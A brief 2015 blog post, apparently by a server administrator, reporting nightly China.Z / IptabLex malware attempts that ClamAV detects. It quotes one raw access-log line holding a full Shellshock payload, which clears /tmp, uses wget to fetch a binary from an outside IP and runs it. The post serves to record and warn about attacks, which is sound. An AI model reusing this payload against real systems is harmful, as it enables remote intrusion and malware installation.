Mittwoch, 6. Mai 2015

China.Z still out there

I am still seeing China.Z malware or variants hitting the system on a regular base (1 to 4 each night). All attack vectors look the same , only the naming changes time by time.

  • /tmp/China.Z-vfxr
  • /tmp/China.Z-boxo
  • /tmp/China.Z-rnxl
  • etc.

All get detected by ClamAV
714.64.1: Linux.Trojan.IptabLex FOUND
 121.207.230.74 - - [07/May/2015:01:50:01 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Please refer to Virustotal for details of the source IP